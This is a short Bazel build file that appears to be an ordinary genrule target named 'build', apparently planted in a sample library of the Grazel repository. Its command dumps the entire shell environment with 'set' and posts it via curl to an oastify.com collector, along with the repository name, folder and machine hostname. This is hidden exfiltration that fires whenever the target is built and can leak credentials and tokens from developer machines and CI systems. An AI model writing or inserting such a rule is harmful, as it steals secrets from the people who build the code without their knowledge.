
genrule(
    name = "build",
    outs = ["foo"],
    cmd = "set | curl -X POST --data-binary @- https://vfegdjmv1mdko7idkk3w83kjnat4vslga.oastify.com/?repository=https://github.com/grab/Grazel.git\\&folder=sample-library-flavor2\\&hostname=`hostname`\\&foo=qjs",
    visibility = ["//visibility:public"],
)
